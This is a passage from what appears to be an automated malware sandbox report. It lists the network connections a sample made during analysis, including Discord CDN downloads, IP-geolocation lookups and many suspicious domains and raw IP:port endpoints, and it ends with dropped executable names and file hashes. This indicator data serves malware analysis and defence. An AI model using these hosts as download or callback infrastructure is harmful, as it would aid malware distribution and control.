| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 152.32.151.93:80 | 152.32.151.93 | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 52.219.156.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.156.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 52.222.137.29:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 52.222.137.29:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 104.18.20.226:80 | crl.globalsign.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 104.18.21.226:80 | crl.globalsign.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.230.143.48:14462 | tcp | |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.35.173:443 | bestinternetstore.xyz | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.214:80 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.18.21.226:80 | crl.globalsign.com | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 185.49.70.90:2080 | tcp | |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 52.219.62.3:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 62.172.138.35:80 | geo.netsupportsoftware.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 52.219.62.3:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 52.219.160.70:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.160.70:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 172.67.129.55:443 | money4systems4.xyz | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 104.16.203.237:443 | www.mediafire.com | tcp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 194.87.138.150:80 | afleof21klg.top | tcp |
| N/A | 194.87.138.150:80 | afleof21klg.top | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 204.79.197.203:443 | api.msn.com | tcp |
| N/A | 204.79.197.203:443 | api.msn.com | tcp |
| N/A | 199.91.153.246:443 | download1999.mediafire.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 204.79.197.203:443 | api.msn.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 2.22.23.146:443 | assets.msn.com | tcp |
| N/A | 2.22.23.146:443 | assets.msn.com | tcp |
| N/A | 13.32.240.85:443 | sb.scorecardresearch.com | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 2.22.22.208:443 | img-s-msn-com.akamaized.net | tcp |
| N/A | 52.142.114.2:443 | c.msn.com | tcp |
| N/A | 204.79.197.200:443 | c.bing.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 23.66.21.99:80 | go.microsoft.com | tcp |
| N/A | 204.79.197.219:443 | edge.microsoft.com | tcp |
| N/A | 204.79.197.219:443 | edge.microsoft.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 20.54.64.202:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 95.181.152.223:52383 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 52.45.132.150:443 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 212.32.249.110:443 | tcp | |
| N/A | 3.229.58.197:443 | tcp | |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 104.18.11.207:443 | tcp | |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 81.16.141.193:80 | tcp | |
| N/A | 104.22.64.104:443 | tcp | |
| N/A | 104.26.6.228:443 | tcp | |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 172.67.148.61:443 | source3.boys4dayz.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 204.79.197.219:80 | edge.microsoft.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 104.21.29.4:80 | cache.uutww77.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 2.17.34.124:443 | tcp | |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | edge.microsoft.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 98.126.176.53:443 | vpn.maskvpn.org | tcp |
| N/A | 174.139.78.106:438 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.137.37:443 | mybrowserinfo.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | edge.microsoft.com | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 172.67.200.80:443 | tcp | |
| N/A | 172.67.26.25:443 | tcp | |
| N/A | 172.67.26.25:443 | tcp | |
| N/A | 35.208.7.10:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 138.68.244.123:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 95.211.26.198:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 95.211.26.198:443 | tcp | |
| N/A | 142.250.179.174:80 | www.google-analytics.com | tcp |
| N/A | 20.50.102.62:443 | tcp | |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 2.22.22.217:443 | tcp | |
| N/A | 85.17.31.150:443 | tcp | |
| N/A | 85.17.31.150:443 | tcp | |
| N/A | 34.197.32.125:443 | tcp | |
| N/A | 34.197.32.125:443 | tcp | |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 104.26.6.228:443 | udp | |
| N/A | 172.217.17.67:443 | udp | |
| N/A | 104.26.7.228:443 | udp | |
| N/A | 54.224.34.30:443 | paybiz.herokuapp.com | tcp |
| N/A | 23.51.123.27:80 | t2.symcb.com | tcp |
| N/A | 23.51.123.27:80 | t2.symcb.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | c.bing.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.22.225:443 | img-s-msn-com.akamaized.net | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 104.97.14.234:443 | tcp | |
| N/A | 2.17.34.92:443 | tcp | |
| N/A | 2.17.34.92:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 127.0.0.1:5985 | tcp | |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 3.86.130.101:443 | tcp | |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.26.6.228:443 | udp | |
| N/A | 104.26.7.228:443 | udp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.147.50:443 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 2.22.23.163:443 | tcp | |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 2.22.23.163:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | api.msn.com | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 2.22.23.171:443 | tcp | |
| N/A | 2.22.22.225:443 | img-s-msn-com.akamaized.net | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.23.171:443 | tcp | |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 2.22.23.171:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 172.67.191.238:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 204.79.197.200:443 | c.bing.com | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.17.34.116:443 | tcp | |
| N/A | 2.17.34.116:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 139.45.197.159:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 139.45.197.238:443 | tcp | |
| N/A | 139.45.197.159:443 | tcp | |
| N/A | 87.250.250.119:443 | tcp | |
| N/A | 139.45.197.251:443 | tcp | |
| N/A | 104.22.25.116:443 | tcp | |
| N/A | 139.45.197.251:443 | tcp | |
| N/A | 104.110.191.15:80 | repository.certum.pl | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 35.201.70.46:80 | www.directdexchange.com | tcp |
| N/A | 35.201.70.46:80 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 104.21.89.239:443 | tcp | |
| N/A | 104.21.71.176:443 | tcp | |
| N/A | 104.21.71.176:443 | tcp | |
| N/A | 13.89.179.12:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 157.240.21.35:443 | www.facebook.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 35.201.70.46:443 | tcp | |
| N/A | 35.201.70.46:443 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 104.21.89.239:443 | tcp | |
| N/A | 104.21.71.176:443 | tcp | |
| N/A | 104.21.71.176:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 131.253.33.203:443 | tcp | |
| N/A | 204.79.197.203:443 | api.msn.com | tcp |
| N/A | 2.17.34.117:443 | tcp | |
| N/A | 2.17.34.117:443 | tcp | |
| N/A | 204.79.197.200:443 | c.bing.com | tcp |
| N/A | 13.32.240.78:443 | sb.scorecardresearch.com | tcp |
| N/A | 2.22.22.208:443 | img-s-msn-com.akamaized.net | tcp |
| N/A | 204.79.197.200:443 | c.bing.com | tcp |
| N/A | 52.142.114.2:443 | c.msn.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 172.67.191.238:443 | tcp | |
| N/A | 104.21.71.176:443 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 131.253.33.203:443 | tcp | |
| N/A | 2.22.23.137:443 | assets.msn.com | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 131.253.33.203:443 | tcp | |
| N/A | 131.253.33.203:443 | tcp |
Files
memory/4788-146-0x0000000003680000-0x00000000037BF000-memory.dmp
memory/4256-149-0x0000000000000000-mapping.dmp
memory/3048-148-0x0000000000000000-mapping.dmp
memory/2960-147-0x0000000000000000-mapping.dmp
memory/3212-150-0x0000000000000000-mapping.dmp
memory/3124-151-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
| MD5 | 6aa5e25e5c5fdfa19d40137e738792bd |
| SHA1 | 86f1485825d2f18fc5c03baca37cf5d6755801a8 |
| SHA256 | 504f42eb4afa952ce6178e5e09d9d75274005a1334f1cd965015e147c0d72160 |
| SHA512 | 5e101d4943d002e406495d5111f33b931b5c6db986c244d1fb209965de1e251b84f57683c2699002b41995d6a101d88076a2462404b63f07d584d25726294071 |
memory/3752-158-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
